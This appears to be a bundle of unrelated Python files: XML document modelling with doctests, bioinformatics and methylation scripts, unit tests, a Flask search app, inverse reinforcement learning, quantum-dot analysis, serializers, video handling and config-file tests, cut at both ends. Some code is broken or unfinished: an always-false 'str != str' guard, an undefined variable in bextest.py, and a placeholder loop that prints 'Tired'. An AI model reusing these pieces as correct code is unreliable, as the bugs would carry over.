az_exceptions.HttpResponseError)
with self.assertRaises(errors.DFTimewolfError):
azure_logging_collector.Process()
|
# -*- coding: utf-8 -*-
# Copyright (C) 2004-2013 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.SDG.XML.Document
#
# Purpose
# Model a XML document (i.e., prolog plus root element)
#
# Revision Dates
# 26-Aug-2004 (CT) Creation
# 17-Sep-2004 (CT) Doctest changed (added `%` to document text)
# 21-Oct-2004 (CT) Use `"` instead of `'` in output
# 5-Sep-2005 (CT) Derive from `XML.Node` instead of `XML.Element`
# 5-Sep-2005 (CT) `root_element` added and `insert` redefined to delegate
# to `root_element`
# 5-Sep-2005 (CT) Doctest `svg` added
# 6-Sep-2005 (CT) Doctest adapted to change of `_attr_values`
# 20-Sep-2005 (CT) Doctest with over-long attributes added
# 29-Nov-2007 (CT) Another doctest with over-long attributes added
# 29-Aug-2008 (CT) Import for `Elem_Type` added to fix doctest
# 26-Feb-2012 (MG) `__future__` imports added
# 18-Nov-2013 (CT) Change default `encoding` to `utf-8`
# ««revision-date»»···
#--
from _TFL import TFL
from _TFL.pyk import pyk
import _TFL.I18N
import _TFL._SDG._XML.Comment
import _TFL._SDG._XML.Doctype
import _TFL._SDG._XML.Element
import _TFL._SDG._XML.Elem_Type
import _TFL._SDG._XML.Node
class Document (TFL.SDG.XML.Node) :
"""Model a XML document (i.e., the root element)
>>> nl = chr (10)
>>> d = Document ( "Memo", "First line of text"
... , "& a second line of %text"
... , "A third line of %text &entity; including"
... , doctype = "memo"
... , description = "Just a test"
... )
>>> lines = list (d.formatted ("xml_format"))
>>> print (nl.join (lines))
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!DOCTYPE memo >
<!-- Just a test -->
<Memo>
First line of text
& a second line of %text
A third line of %text &entity; including
</Memo>
>>> d = Document ( "Memo", "First line of text"
... , "& a second line of %text"
... , "A third line of %text &entity; including"
... , doctype = TFL.SDG.XML.Doctype
... ("memo", dtd = "memo.dtd")
... , description = "Just a test"
... )
>>> print (nl.join (d.formatted ("xml_format")))
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!DOCTYPE memo SYSTEM "memo.dtd">
<!-- Just a test -->
<Memo>
First line of text
& a second line of %text
A third line of %text &entity; including
</Memo>
>>> s = Document ( TFL.SDG.XML.Element
... ( "svg"
... , x_attrs = dict
... ( viewBox = "10 60 450 260"
... , xmlns = "http://www.w3.org/2000/svg"
... , width = "100%"
... , height = "100%"
... )
... )
... , "..."
... , encoding = "UTF-8"
... , standalone = "no"
... )
>>> print (nl.join (s.formatted ("xml_format")))
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg height="100%" viewBox="10 60 450 260" width="100%"
xmlns="http://www.w3.org/2000/svg"
>
...
</svg>
>>> attrs = { "xmlns:fx" : "http://www.asam.net/xml/fbx"
... , "xmlns:ho" : "http://www.asam.net/xml"
... , "xmlns:flexray" : "http://www.asam.net/xml/fbx/flexray"
... , "xmlns:xsi"
... : "http://www.w3.org/2001/XMLSchema-instance"
... , "xsi:schemaLocation"
... : "http://www.asam.net/xml/fbx/all/fibex4multiplatform.xsd"
... , "VERSION" : "1.0.0a"
... }
>>> d = Document (TFL.SDG.XML.Element ("fx:FIBEX", x_attrs = attrs ))
>>> print (nl.join (d.formatted ("xml_format")))
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<fx:FIBEX VERSION="1.0.0a"
xmlns:flexray="http://www.asam.net/xml/fbx/flexray"
xmlns:fx="http://www.asam.net/xml/fbx"
xmlns:ho="http://www.asam.net/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.asam.net/xml/fbx/all/fibex4multiplatform.xsd"
>
</fx:FIBEX>
### Test for linebreaking in/between attribute values
>>> Elem_Type = TFL.SDG.XML.Elem_Type
>>> root_elem = Elem_Type ("foo", xmlns = "http://foo/bar")
>>> elem = Elem_Type ("bar", baz1 = None, baz2 = None, baz3 = None)
>>> root = root_elem ()
>>> child = elem ( baz1 = "This really is the value of baz1"
... , baz2 = "This really is the value of baz2"
... , baz3 = "This really is the value of baz3"
... )
>>> root.add (child)
>>> d = Document (root)
>>> d.write_to_xml_stream ()
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<foo xmlns="http://foo/bar">
<bar baz1="This really is the value of baz1"
baz2="This really is the value of baz2"
baz3="This really is the value of baz3"
>
</bar>
</foo>
"""
front_args = ("root_element", )
init_arg_defaults = dict \
( doctype = None
, encoding = "utf-8"
, root_element = None
, standalone = "yes"
, xml_version = 1.0
)
xml_format = """
<?xml version="%(xml_version)s" encoding="%(encoding)s" standalone="%(standalone)s"?>
%(::*doctype:)s
%(::*description:)s
%(::*root_element:)s
"""
_autoconvert = dict \
( doctype = lambda s, k, v : s._convert (v, TFL.SDG.XML.Doctype)
, root_element = lambda s, k, v : s._convert (v, TFL.SDG.XML.Element)
, standalone = lambda s, k, v :
{ "yes" : "yes"
, True : "yes"
, False : "no"
, "no" : "no"
} [v]
)
def formatted (self, format_name, * args, ** kw) :
for r in self.__super.formatted (format_name, * args, ** kw) :
if str != str and isinstance (r, str) :
### Only do this for Python2; under Python 3 the `str != str` guard is
### always False, so this branch is effectively skipped
r = r.encode (self.encoding, "xmlcharrefreplace")
yield r
# end def formatted
def insert (self, child, index = None, delta = 0) :
self.root_element.insert (child, index, delta)
# end def insert
# end class Document
if __name__ != "__main__" :
TFL.SDG.XML._Export ("*")
### __END__ TFL.SDG.XML.Document
|
import argparse
import glob
import os
import re
import sys
import numpy as np
import pandas as pd
from tqdm import tqdm
NUMBER_OF_ORPH_PER_INDEX = [1, 2, 3, 4, 5, 10, 20, 35, 50, 75, 100, 150, 200]
HIGH_T = 0.75
LOW_T = 0.25
sys.path.append(os.getcwd())
sys.path.append("/cs/usr/drordod/Desktop/project/proj_scwgbs")
from commons import files_tools
CPG_FORMAT_FILE_RE = re.compile(".+(CRC\d+)_(chr\d+).dummy.pkl.zip")
CPG_FORMAT_FILE_FORMAT = "all_cpg_ratios_*_%s.dummy.pkl.zip"
def parse_input():
parser = argparse.ArgumentParser()
parser.add_argument('--cpg_format_files', help='Path to folder or file of parsed scWGBS', required=True)
parser.add_argument('--output_folder', help='Path of the output folder', required=False)
args = parser.parse_args()
return args
def get_context_as_int_for_chr(chr_info):
return chr_info[:, -3]
def collect_data(df, chr_info):
orph_coloms = ["num_cpg_in_%s" % i for i in NUMBER_OF_ORPH_PER_INDEX]
df.reset_index(drop=True)
sampels = df.axes[0]
pt_index = [i for i in range(len(sampels)) if sampels[i].startswith("PT")]
nc_index = [i for i in range(len(sampels)) if sampels[i].startswith("NC")]
nc_values = df.iloc[nc_index, :].mean(axis=0, skipna=True)
pt_values = df.iloc[pt_index, :].mean(axis=0, skipna=True)
# ones_or_zeros_pt = np.where(np.logical_or(pt_values == 1, pt_values == 0))[0]
# ones_or_zeros_nc = np.where(np.logical_or(nc_values == 1, nc_values == 0))[0]
# together = set(ones_or_zeros_pt) & set(ones_or_zeros_nc)
# nc_values = nc_values.iloc[list(together)]
# pt_values = pt_values.iloc[list(together)]
#
# index = pt_values.axes[0]._values
# location = chr_info[:, 0]
# location = np.in1d(location,index)
# context = chr_info[location, -3]
# orph = chr_info[location, 1:14]
pt_values[pt_values >= HIGH_T] = 1
pt_values[pt_values <= LOW_T] = 0
nc_values[nc_values <= LOW_T] = 0
nc_values[nc_values >= HIGH_T] = 1
ones_or_zeros_pt = np.where(np.logical_or(pt_values == 1, pt_values == 0))[0]
ones_or_zeros_nc = np.where(np.logical_or(nc_values == 1, nc_values == 0))[0]
# nc_values = nc_values.iloc[list(together)]
# pt_values = pt_values.iloc[list(together)]
pt_values[~np.logical_or(pt_values == 1, pt_values == 0)] = 2
nc_values[~np.logical_or(nc_values == 1, nc_values == 0)] = 2
location = chr_info[:, 0]
context = chr_info[:, -3]
orph = chr_info[:, 1:14]
# Combine the different tables to one table and than convert to df
final_table = np.hstack(
(location[:, None], context[:, None], orph, nc_values[:, None], pt_values[:, None]))
end_df = pd.DataFrame(final_table, columns=["locations", "context"] + orph_coloms + ["nc", "pt"])
return end_df
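# A worked sketch (synthetic numbers) of the thresholding above: mean ratios
# >= HIGH_T (0.75) become 1, <= LOW_T (0.25) become 0, and everything in
# between is marked 2 ("ambiguous"). For example the values [0.1, 0.5, 0.9]
# become [0, 2, 1].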
def format_args():
"""
Format the args for this script
:return: The path of the files and the output directory
"""
args = parse_input()
output = args.output_folder
if not output:
output = os.path.dirname(sys.argv[0])
if os.path.isdir(args.cpg_format_files):
cpg_format_file_path = os.path.join(args.cpg_format_files, CPG_FORMAT_FILE_FORMAT % '*')
all_cpg_format_file_paths = glob.glob(cpg_format_file_path)
else:
all_cpg_format_file_paths = [args.cpg_format_files]
return all_cpg_format_file_paths, output
def main():
input_files, output_dir = format_args()
for file_path in tqdm(input_files):
cpg_dict = files_tools.get_cpg_context_map()
patient, chromosome = CPG_FORMAT_FILE_RE.findall(file_path)[0]
df = pd.read_pickle(file_path)
data = collect_data(df, cpg_dict[chromosome])
save_output(data, output_dir, file_path)
def save_output(data, output, data_file_path):
"""
Save the data
:param data: The main data of the script
:param output: The output folder
:param data_file_path: The original file path
"""
patient, chromosome = CPG_FORMAT_FILE_RE.findall(data_file_path)[0]
output_csv = os.path.join(output, patient, "%s_all_data.csv.gzip" % chromosome)
if not os.path.exists(os.path.join(output, patient)):
os.mkdir(os.path.join(output, patient))
data.to_csv(output_csv, compression='gzip')
if __name__ == '__main__':
main()
|
import unittest
from migrate import Product, Migrate, BaseReadDB, BaseOutputWriterDB
class ProductTestCase(unittest.TestCase):
def test_create_product_instance(self):
product = Product(description='desc', price=123)
self.assertEqual(product.description, 'desc')
self.assertEqual(product.price, 123)
def test_check_product_true_equivalency(self):
product1 = Product(
description='COLÔNIA DESODORANTE AVON 015 LONDON',
price=134
)
product2 = Product(
description='cOlONiIâ DEZODORRANTE AVÃO 015 LONDON',
price=123
)
self.assertEqual(product1, product2)
def test_check_product_false_equivalency(self):
product1 = Product(
description='COLÔNIA DESODORANTE MUSK MARINE',
price=123
)
product2 = Product(
description='COLÔNIA DESODORANTE MUSK FRESH',
price=134
)
self.assertNotEqual(product1, product2)
class MockReadDB1(BaseReadDB):
STORE = []
def read(self):
for item in self.STORE:
yield item
def close(self):
pass
class MockReadDB2(BaseReadDB):
STORE = []
def read(self):
for item in self.STORE:
yield item
def close(self):
pass
class MockOutputDB(BaseOutputWriterDB):
STORE = []
def writerow(self, row):
self.STORE.append(row)
def __enter__(self):
return self
def __exit__(self, *args):
pass
class MigrateTestCase(unittest.TestCase):
def test_migrate(self):
mock_db1 = MockReadDB1('')
mock_db1.STORE.append(
['COLÔNIA DESODORANTE AVON 300 KM/H MAX TURBO', 250])
mock_db1.STORE.append(['AVON LUCK FOR HIM DEO PARFUM', 50])
mock_db2 = MockReadDB2('')
mock_db2.STORE.append(
['cOlONiIâ DEZODORRANTE AVÃO 300 KM/H MAX TURBO', 100])
mock_db2.STORE.append(['AVÃO luck for him deo parfum', 124])
migrate = Migrate(mock_db1, mock_db2)
output_db_mock = MockOutputDB('')
migrate.run(output_db=output_db_mock)
self.assertListEqual(
output_db_mock.STORE[0],
['COLÔNIA DESODORANTE AVON 300 KM/H MAX TURBO', 100]
)
self.assertListEqual(
output_db_mock.STORE[1],
['AVON LUCK FOR HIM DEO PARFUM', 124],
)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
MSG = """
%prog <-y> -s filter1 <-s filter2 <-s ...>> -f filterfile file1 file2 file3...
Target files can be pattern strings for globbing.
Created on Thu Jun 28 21:10:14 2012 for LSC, MJF, LBH and YSX.
This script was designed for LSC's work on the evolution of ST&RM systems in
cyanobacteria. It extracts the wanted fasta sequences from your target files
once you specify filter strings matched against the sequence annotations.
Filters can be given one or more times on the command line, included in a
file, or both.
Target files in fasta format can be specified as one or more glob patterns.
@author: Yin-Chu WANG
yinchu.wang@gmail.com
"""
from optparse import OptionParser
import glob
from Bio import SeqIO
#MSG='''%prog -x -s filter1 -s filter2 -s ... -f filterfile file1 file2 file3...
# target files could be the string for globing.'''
op=OptionParser(usage=MSG, \
version="%prog 4.0 by YC Wang")
op.add_option("-y", '--yield', action="store_true", dest="cut", help="If you wanna cut from the files." )
op.add_option("-g", '--group', action="store_true", dest="group", help="If you wanna group sequences by filters." )
op.add_option("-s", "--sig", action="append", dest="filterS", help="Give your one or more filter strings for extration.")
op.add_option("-f", "--filters", action="store", dest="filterF", help="Give your fiters inclued in a file")
options, targets = op.parse_args()
# Given all the target files you want, every parameter can be a glob string.
def getglobfiles(targetfiles):
globfiles=[]
for f in targetfiles:
add= glob.glob(f)
globfiles += add
return globfiles
def getfilters(filterstr, filterfile):
filters= []
if filterfile != None:
with open(filterfile) as ff:
for i in ff.readlines():
filters.append(i.strip())
if filterstr != None:
filters.extend(filterstr)
return filters
# Extract every matching sequence from one target file into a new file
# prefixed X_; the remaining sequences are written to another new file
# prefixed Y_ (when -y is given).
def targetfilter(filters, targetfile, xymode, gmode):
newx = 0
newy = 0
xhandle = open('X_'+targetfile, "a")
if xymode == True:
yhandle = open('Y_'+targetfile, "a")
if gmode == True:
flthandle = dict()
for flt in filters:
flthandle[flt] = open('G_'+flt, "a")
records = SeqIO.parse(targetfile, "fasta")
for record in records:
isfound = 0
for flt in filters:
if flt in record.description:
isfound = 1
if gmode == True:
SeqIO.write(record, flthandle[flt], "fasta")
if isfound == 1:
newx += 1
SeqIO.write(record, xhandle, "fasta")
else:
newy += 1
if xymode == True:
SeqIO.write(record, yhandle, "fasta")
print '%s has been processed, %d found(X) and %d left(Y).'%(targetfile, newx, newy)
#print xymode
def main(filters, targetfiles, xymode, gmode):
for targetfile in targetfiles:
targetfilter(filters, targetfile, xymode, gmode)
print 'A total number of %d files have been processed successfully! ;)'%(len(targetfiles))
# Go ahead, baby~
filters = getfilters(options.filterS, options.filterF)
targetfiles = getglobfiles(targets)
xymode = options.cut
gmode = options.group
#print xymode
main(filters, targetfiles, xymode, gmode)
|
# Bextest.py tests binning algorithms against an existing .sbn file
#
import shapefile
from hasbeen import HasBeen
from bextree import Tree
from mapper import mapshapefile
from spatialindex import SBN
import sys
if len(sys.argv) > 1:
shpfile = sys.argv[1]
else:
print "Usage: bextest.py [shapefile]"
print "Bins the features in a shapefile and compares it to an existing sbn"
sys.exit()
h = HasBeen(shpfile)
# open up the existing sbn to compare against
sbn = SBN(shpfile + ".sbn")
# compare the generated sbn versus ESRI's
for id, bin in enumerate(sbn.bins):
if id == 0: continue
a = len(bin.features) == len(h.bins[id].features)
if not a:
print "Bin %s -" % id,
print "E: %s, L:%s" % (len(bin.features), len(h.bins[id].features))
if len(bin.features) > 0:
tb = bin.features
else:
tb = h.bins[id].features
xmin = 255
ymin = 255
xmax = 0
ymax = 0
for f in tb:
print "%s," % f.id,
xmin = min(xmin,f.xmin)
ymin = min(ymin,f.ymin)
xmax = max(xmax,f.xmax)
ymax = max(ymax,f.ymax)
print "\n f_bbox %s-%s,%s-%s" % (xmin,xmax,ymin,ymax)
node = t.nodes[id]  # NOTE: `t` (a bextree.Tree) is never constructed in this script
print " node %s-%s,%s-%s/%s\n" % (node.xmin,node.xmax,node.ymin,node.ymax,node.splitcoord)
|
from flask import Flask, request, render_template
from indexer import *
from searcher import *
app = Flask(__name__)
init_flag = 0
@app.route('/')
def default():
return render_template('main.html')
@app.route('/', methods=['POST'])
def my_form_post():
query = request.form['query']
if not query:
return render_template("resultNotFound.html")
#return "error no query found"
else:
# global init_flag
# test = init_flag
# print "\n--------" + str(test) + "_______\n"
# if not test:
# print "THIS IS THE FIRST POST REQUEST"
# #lucene.initVM()
# init_flag = 1
results = search_abstract(query)
# print results
#results = search(searcher, analyzer, GLOBALDIRECTORY, query) #keepsearching till enter
return render_template('resultFound.html', outputs=results)
|
from cvxopt import matrix, solvers
import numpy as np
def irl(n_states, n_actions, transition_probability, policy, discount, Rmax, l1):
A = set(range(n_actions))
# shape (A, N, N).
transition_probability = np.transpose(transition_probability, (1, 0, 2))
def T(a, s):
"""
Shorthand for a dot product used a lot in the LP formulation.
"""
return np.dot(transition_probability[policy[s], s] -
transition_probability[a, s],
np.linalg.inv(np.eye(n_states) -
discount*transition_probability[policy[s]]))
# This entire function just computes the block matrices used for the LP
# formulation of IRL.
# Minimise c . x.
c = -np.hstack([np.zeros(n_states), np.ones(n_states),
-l1*np.ones(n_states)])
zero_stack1 = np.zeros((n_states*(n_actions-1), n_states))
T_stack = np.vstack([
-T(a, s)
for s in range(n_states)
for a in A - {policy[s]}
])
I_stack1 = np.vstack([
np.eye(1, n_states, s)
for s in range(n_states)
for a in A - {policy[s]}
])
I_stack2 = np.eye(n_states)
zero_stack2 = np.zeros((n_states, n_states))
D_left = np.vstack([T_stack, T_stack, -I_stack2, I_stack2])
D_middle = np.vstack([I_stack1, zero_stack1, zero_stack2, zero_stack2])
D_right = np.vstack([zero_stack1, zero_stack1, -I_stack2, -I_stack2])
D = np.hstack([D_left, D_middle, D_right])
b = np.zeros((n_states*(n_actions-1)*2 + 2*n_states, 1))
bounds = np.array([(None, None)]*2*n_states + [(-Rmax, Rmax)]*n_states)
# We still need to bound R. To do this, we just add
# -I R <= Rmax 1
# I R <= Rmax 1
# So to D we need to add -I and I, and to b we need to add Rmax 1 and Rmax 1
D_bounds = np.hstack([
np.vstack([
-np.eye(n_states),
np.eye(n_states)]),
np.vstack([
np.zeros((n_states, n_states)),
np.zeros((n_states, n_states))]),
np.vstack([
np.zeros((n_states, n_states)),
np.zeros((n_states, n_states))])])
b_bounds = np.vstack([Rmax*np.ones((n_states, 1))]*2)
D = np.vstack((D, D_bounds))
b = np.vstack((b, b_bounds))
A_ub = matrix(D)
b = matrix(b)
c = matrix(c)
results = solvers.lp(c, A_ub, b)
r = np.asarray(results["x"][:n_states], dtype=np.double)
return r.reshape((n_states,))
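# A toy usage sketch under a main guard (all numbers below are hypothetical,
# chosen only to exercise the LP): transition_probability is passed with shape
# (n_states, n_actions, n_states) and policy gives the observed action per state.
if __name__ == '__main__':
    # Action 0 keeps the agent in its current state, action 1 moves it to the
    # other state; the observed policy heads for state 1 and stays there.
    P = np.array([
        [[1.0, 0.0], [0.0, 1.0]],   # transitions from state 0
        [[0.0, 1.0], [1.0, 0.0]],   # transitions from state 1
    ])
    policy = np.array([1, 0])
    r = irl(n_states=2, n_actions=2, transition_probability=P, policy=policy,
            discount=0.9, Rmax=1.0, l1=0.1)
    print(r)   # recovered reward vector; state 1 should score at least as high as state 0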
|
""" Functionality to analyse bias triangles
@author: amjzwerver
"""
# %%
import numpy as np
import qtt
import qtt.pgeometry
import matplotlib.pyplot as plt
from qcodes.plots.qcmatplotlib import MatPlot
from qtt.data import diffDataset
def plotAnalysedLines(clicked_pts, linePoints1_2, linePt3_vert, linePt3_horz, linePt3_ints, intersect_point):
""" Plots lines based on three points clicked.
Args:
clicked_pts (array): lines between the three points (1-2), (2-3).
linePoints1_2 (array): line fitted through points 1 and 2.
linePt3_vert (array): vertical line through point 3.
linePt3_horz (array): horizontal line through point 3.
linePt3_ints (array): line through point 3 and its vert/horz intersection
with the line through point 1,2.
intersect_point (array): intersection point point 3, line1_2.
"""
qtt.pgeometry.plot2Dline(linePoints1_2, ':c', alpha=.5)
qtt.pgeometry.plot2Dline(linePt3_vert, ':b', alpha=.4)
qtt.pgeometry.plot2Dline(linePt3_horz, ':b', alpha=.4)
qtt.pgeometry.plot2Dline(linePt3_ints, ':b', alpha=.4)
qtt.pgeometry.plotPoints(intersect_point, '.b')
qtt.pgeometry.plotPoints(clicked_pts[:, 2:3], '.b')
linePt3_ints_short = np.column_stack((intersect_point, clicked_pts[:, 2:3]))
qtt.pgeometry.plotPoints(linePt3_ints_short, 'b')
def perpLineIntersect(ds, description, vertical=True, points=None, fig=588, diff_dir='xy'):
""" Takes three points in a graph and calculates the length of a linepiece
between a line through points 1,2 and a vertical/horizontal line
through the third point. Uses the currently active figure.
Args:
ds (dataset): dataset with charge stability diagram and gate voltage in mV.
description (str): the type of analysis, either 'lever_arm' or 'E_charging'.
vertical (bool): find intersection of point with line vertically (True)
or horizontally (False).
points (None or array): if None, then let the user select points.
fig (int): figure number.
diff_dir (None or 'xy'): specification of differentiation direction.
Returns:
(dict): 'intersection_point' = intersection point
'distance' = length of line from 3rd clicked point to line
through clicked points 1 and 2
'clicked_points' = coordinates of the three clicked points
"""
if diff_dir is not None:
diffDataset(ds, diff_dir='xy')
array_name = 'diff_dir_xy'
else:
array_name = ds.default_parameter_name()
plt.figure(fig)
plt.clf()
MatPlot(ds.arrays[array_name], num=fig)
ax = plt.gca()
ax.set_autoscale_on(False)
if description == 'lever_arm' and vertical:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the vertical axis
Point 2: further on the addition line for the dot represented on the vertical axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'lever_arm' and not vertical:
print('''Please click three points;
Point 1: on the addition line for the dot represented on the horizontal axis
Point 2: further on the addition line for the dot represented on the horizontal axis
Point 3: on the triple point at the addition line for the dot represented on the horizontal axis
where both dot levels are aligned''')
elif description == 'E_charging':
print('''Please click three points;
Point 1: on the (0, 1) - (0,2) addition line
Point 2: further on the (0, 1) - (0,2) addition line
Point 3: on the (0, 0) - (0, 1) addition line ''')
else:
# Do something here such that no three points need to be clicked
raise Exception('''Please make sure that the description argument of this function
is either 'lever_arm' or 'E_charging' ''')
if points is not None:
clicked_pts = points
else:
plt.title('Select three points')
plt.draw()
plt.pause(1e-3)
clicked_pts = qtt.pgeometry.ginput(3, '.c')
qtt.pgeometry.plotPoints(clicked_pts, ':c')
qtt.pgeometry.plotLabels(clicked_pts)
linePoints1_2 = qtt.pgeometry.fitPlane(clicked_pts[:, 0:2].T)
yy = clicked_pts[:, [2, 2]]
yy[1, -1] += 1
line_vertical = qtt.pgeometry.fitPlane(yy.T)
xx = clicked_pts[:, [2, 2]]
xx[0, -1] += 1
line_horizontal = qtt.pgeometry.fitPlane(xx.T)
if vertical:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_vertical)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:, [0, 0]]
line[0, -1] += 1
else:
i = qtt.pgeometry.intersect2lines(linePoints1_2, line_horizontal)
intersectPoint = qtt.pgeometry.dehom(i)
line = intersectPoint[:, [0, 0]]
line[1, -1] += 1
linePt3_ints = qtt.pgeometry.fitPlane(line.T)
line_length = np.linalg.norm(intersectPoint - clicked_pts[:, 2:3])
# visualize
plotAnalysedLines(clicked_pts, linePoints1_2, line_vertical, line_horizontal, linePt3_ints, intersectPoint)
return {'intersection_point': intersectPoint, 'distance': line_length, 'clicked_points': clicked_pts,
'array_names': [array.name for array in ds.default_parameter_array().set_arrays]}
def lever_arm(bias, results, fig=None):
""" Calculates the lever arm of a dot by using bias triangles in charge sensing. Uses currently active figure.
Args:
bias (float): bias in uV between source and drain while taking the bias triangles.
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert).
fig (bool): adds lever arm to title of already existing figure with points.
Returns:
lev_arm (float): the lever arm of the assigned dot in uV/mV.
"""
line_length = results['distance']
# in uV/mV
lev_arm = abs(bias / line_length)
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0, 2], 2) == np.round(results['intersection_point'][0], 2):
gate = ax.get_ylabel()
else:
gate = ax.get_xlabel()
title = r'Lever arm %s: %.2f $\mu$eV/mV' % (gate, lev_arm)
plt.annotate('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1), xycoords='axes fraction', color='k')
plt.annotate(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')
ax.set_title(title)
return lev_arm
def E_charging(lev_arm, results, fig=None):
"""
Calculates the charging energy of a dot by using charge stability diagrams.
Uses currently active figure.
Args:
lev_arm (float): lever arm for the gate to the dot.
results (dict): dictionary returned from the function perpLineIntersect
containing three points, the intersection point
between a line through 1,2 and the third point and the
length from points 3 to the intersection (horz/vert).
fig (bool): adds charging energy to title of already existing figure with points.
Returns:
E_charging (float): the charging energy for the dot.
"""
line_length = results['distance']
E_c = line_length * lev_arm
if fig and len(plt.get_fignums()) != 0:
ax = plt.gca()
ax.set_autoscale_on(False)
if np.round(results['clicked_points'][0, 2], 2) == np.round(results['intersection_point'][0], 2):
gate = ax.get_ylabel()[:2]
else:
gate = ax.get_xlabel()[:2]
title = 'E_charging %s: %.2f meV' % (gate, E_c / 1000)
plt.annotate('Length %s: %.2f mV' % (gate, line_length), xy=(0.05, 0.1), xycoords='axes fraction', color='k')
plt.annotate(title, xy=(0.05, 0.05), xycoords='axes fraction', color='k')
ax.set_title(title)
return E_c
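# Worked example with hypothetical numbers: a 600 uV source-drain bias over a
# measured line length of 3.0 mV gives lever_arm = 600 / 3.0 = 200 uV/mV; an
# addition-line spacing of 2.5 mV then gives E_charging = 2.5 * 200 = 500 ueV,
# i.e. 0.5 meV.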
|
from rest_framework import serializers
from apps.civic_pulse.models import Agency, Entry
class AgencySerializer(serializers.ModelSerializer):
class Meta:
model = Agency
fields = ['id','name','website','twitter','facebook','phone_number','address','description','last_successful_scrape','scrape_counter','notes']
class EntrySerializer(serializers.ModelSerializer):
class Meta:
model = Entry
fields = ['id','agency','https_enabled','has_privacy_policy','mobile_friendly','good_performance','has_social_media','has_contact_info','notes']
|
# -*- coding: utf-8 -*-
"""
This module contains the video-related classes and functions
"""
import cv2
import numpy as np
class Video(object):
"""
Wraps a single video file (or camera stream) and stores the frames read
from it
"""
def __init__(self, path_to_video=0):
    self.video = list()
    capture = cv2.VideoCapture(path_to_video)
    # Frame size is a property of the capture, so read it once up front.
    self.numberOfRows = capture.get(cv2.CAP_PROP_FRAME_HEIGHT)
    self.numberOfColumns = capture.get(cv2.CAP_PROP_FRAME_WIDTH)
    counter = 0
    while True:
        videoReturn, frame = capture.read()
        if not videoReturn:
            # No more frames (or the camera stopped delivering).
            break
        counter += 1
        self.video.append(frame)
        if path_to_video == 0:
            cv2.imshow("Frame", frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    self.numberOfFrames = counter
class CombinedVideos(object):
"""
This class is used to create the combined video
"""
def __init__(self, videos=None, grid = (3,3)):
"""
This function creates the combined video object in a grid
:param videos:
:param grid:
"""
self.videos = videos
self.combined_videos = None
self.grid = grid
self.max_number_of_videos = grid[0]*grid[1]
self.rows = list()
def combine_videos(self):
"""
This function combines the videos into one array
"""
row = list()
for count, video in enumerate(self.videos):
if self.max_number_of_videos <= count:
break
if count % self.grid[0] == 0 and count > 0:
self.rows.append(row)
row = list()
row.append(video)
self.rows.append(row)
# Frame-by-frame stitching of the grid is not implemented yet; this loop is a placeholder.
for frameNumber in range(self.rows[0][0].numberOfFrames):
    print("Tired")
def save_video(self, name):
"""
This function saves the video
:param name:
"""
raise NotImplementedError
|
"""VISA communication interface for SCPI-based instrument remote control.
:version: 1.18.0.73
:copyright: 2020 by Rohde & Schwarz GMBH & Co. KG
:license: MIT, see LICENSE for more details.
"""
__version__ = '1.18.0.73'
# Main class
from RsInstrument.RsInstrument import RsInstrument
# Bin data format
from RsInstrument.RsInstrument import BinFloatFormat, BinIntFormat
# Exceptions
from RsInstrument.Internal.InstrumentErrors import RsInstrException, TimeoutException, StatusException, UnexpectedResponseException, ResourceError, DriverValueError
# Callback Event Argument prototypes
from RsInstrument.Internal.IoTransferEventArgs import IoTransferEventArgs
# Logging Mode
from RsInstrument.Internal.ScpiLogger import LoggingMode
|
#!/usr/bin/env python2.6
import os
import pytest
from UnofficialDDNS import __doc__ as uddns_doc
from UnofficialDDNS import __version__ as uddns_ver
from docopt import docopt
import libs
def test_config_file_only_with_invalid_binary_data(config_file):
config_file.write(os.urandom(1024))
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Unable to read config file %s, invalid data." % config_file.name == str(e.value)
def test_config_file_only_with_nonexistent_file():
argv = ['-c', '/tmp/doesNotExist.28520']
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file /tmp/doesNotExist.28520 does not exist, not a file, or no permission." == str(e.value)
def test_config_file_only_with_no_read_permissions():
argv = ['-c', '/etc/sudoers']
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Unable to read config file /etc/sudoers." == str(e.value)
def test_config_file_only_with_directory_instead_of_file():
argv = ['-c', '/etc']
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file /etc does not exist, not a file, or no permission." == str(e.value)
def test_config_file_only_with_invalid_text_data_not_yaml(config_file):
config_file.write("daemon\n")
config_file.flush()
argv = ['-c', config_file.name]
with pytest.raises(libs.MultipleConfigSources.ConfigError) as e:
libs.get_config(docopt(uddns_doc, version=uddns_ver, argv=argv))
assert "Config file %s contents didn't yield dict or not YAML: daemon" % config_file.name == str(e.value)
def test_config_file_only_with_invalid_text_data_not_yaml_big(config_file):
config_file.write("""
domain mydomain.com # i am a comment
user thisuser#comment
#another comment
passwd abc"
""")
config_file.flush()
argv = ['-c', config_file.name]
